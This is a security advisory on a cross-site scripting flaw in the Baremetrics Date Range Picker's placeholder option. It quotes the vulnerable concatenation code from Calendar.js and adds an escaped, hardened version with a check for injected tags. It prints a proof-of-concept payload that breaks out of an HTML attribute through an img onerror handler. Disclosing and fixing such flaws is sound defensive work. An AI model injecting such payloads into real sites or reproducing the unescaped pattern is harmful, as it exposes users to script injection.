Coordinated Disclosure Timeline

Summary

Baremetrics Date Range Picker is prone to Cross-site scripting (XSS) when handling untrusted placeholder entries.

Product

Baremetrics Date Range Picker

Tested Version

v1.0.14

Details

Issue 1: XSS in placeholder (GHSL-2021-1042)

An attacker who is able to influence the field placeholder when creating a Calendar instance can supply arbitrary HTML or JavaScript, which is rendered in the context of the user, leading to XSS.

Proof of concept snippet:

    var ss = new Calendar({
      element: $('.daterange--single'),
      format: {input: 'YYYY'},
      placeholder: 'Foobar"> <img src="foobar" onerror="alert(3)" /><',
      required: false,
      callback: function() {
        console.log('Single calendar callback triggered');
      }
    });

Vulnerable code: Calendar.js

    return this.element.append('<div class="dr-input">' +
      '<div class="dr-dates">' +
        '<div class="dr-date" contenteditable placeholder="'+ this.placeholder +'">'+ (this.settings.current_date ? moment(this.current_date).format(this.format.input) : '') +'</div>' +
      '</div>' +
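The following is an added example, not code from Calendar.js or the Baremetrics project: it places the raw concatenation pattern shown above beside a hardened variant that HTML-escapes the placeholder (and the current date) before they are inserted into the attribute, and includes a small tag-count check that flags a breakout. Function names (escapeHtmlAttr, renderDateInputVulnerable, renderDateInputSafe, countStartTags) are this example's own; jQuery and moment are omitted so it runs under plain Node.

```javascript
// Added example (not Calendar.js code). Names below are assumptions of this
// example, not identifiers from the project.

// Encode the characters that can terminate a quoted attribute value or start
// new markup. The double quote is the one that matters most here, because the
// placeholder sits inside placeholder="...".
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Mirrors the vulnerable pattern: the untrusted placeholder is concatenated
// straight into the attribute, so a quote in it closes the attribute.
function renderDateInputVulnerable(placeholder, currentDate) {
  return '<div class="dr-input">' +
    '<div class="dr-dates">' +
      '<div class="dr-date" contenteditable placeholder="' + placeholder + '">' +
        (currentDate || '') +
      '</div>' +
    '</div>' +
  '</div>';
}

// Hardened form: every value that reaches an attribute or text node is escaped.
function renderDateInputSafe(placeholder, currentDate) {
  return '<div class="dr-input">' +
    '<div class="dr-dates">' +
      '<div class="dr-date" contenteditable placeholder="' + escapeHtmlAttr(placeholder) + '">' +
        escapeHtmlAttr(currentDate || '') +
      '</div>' +
    '</div>' +
  '</div>';
}

// Check: the template emits exactly three start tags (<div ...>). Any extra
// start tag in the rendered markup means untrusted input broke out.
function countStartTags(html) {
  return (html.match(/<[a-zA-Z][^\s>\/]*/g) || []).length;
}

// Constructed input: the proof-of-concept placeholder from the advisory above.
const POC_PLACEHOLDER = 'Foobar"> <img src="foobar" onerror="alert(3)" /><';
```

Run against POC_PLACEHOLDER, the vulnerable renderer yields four start tags (an injected img), while the hardened renderer yields three and contains no raw `<`.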

Impact

This issue may lead to XSS.

Resources

CVE

Credit

This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2021-1042 in any communication regarding this issue.